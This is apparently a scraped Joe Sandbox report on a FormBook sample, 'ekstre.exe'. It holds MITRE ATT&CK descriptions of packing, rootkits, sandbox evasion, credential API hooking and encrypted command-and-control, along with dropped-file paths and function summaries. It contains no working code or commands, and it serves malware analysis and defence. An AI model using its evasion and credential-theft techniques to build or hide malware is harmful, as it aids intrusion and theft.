Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ekstre.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll

C:\Users\user\AppData\Roaming\DORME.ini

C:\Users\user\procharity\Anasarca\Uncompelled\Barton\Skattegldsposterne\MapiProxy_InUse.dll

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\edit-delete-symbolic.symbolic.png

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\format-justify-right.png

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\format-text-strikethrough-symbolic.symbolic.png

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\mail-mark-junk-symbolic.symbolic.png

C:\Users\user\procharity\Anasarca\Uncompelled\Bechamels\nn.txt

C:\Users\user\procharity\Anasarca\Uncompelled\Berbers\object-flip-vertical-symbolic.svg

C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral\orientation-portrait-right-symbolic.svg

C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral\schema-639-5.json

C:\Users\user\procharity\Anasarca\Uncompelled\Ediktet\Tavlemestrene\Ungeneral\video-display-symbolic.svg

C:\Users\user\procharity\Anasarca\Uncompelled\Gaardsbredde\cartiest\PangoOT-1.0.typelib

C:\Users\user\procharity\Anasarca\Uncompelled\Gaardsbredde\cartiest\document-open-recent-symbolic.svg

C:\Users\user\procharity\Anasarca\Uncompelled\Gaardsbredde\cartiest\document-revert-symbolic-rtl.svg

C:\Users\user\procharity\Anasarca\Uncompelled\Indoktrineringens\Green_Leaves_11.bmp

Windows Analysis Report
ekstre.exe

Function 00403390 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 417
stringfilecomCOMMON

Function 00402F0C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181
memoryCOMMON

Function 004059F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159
filestringCOMMON

Function 004065AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403DB7 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Function 00403A1A Relevance: 40.5, APIs: 14, Strings: 9, Instructions: 215
stringregistryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre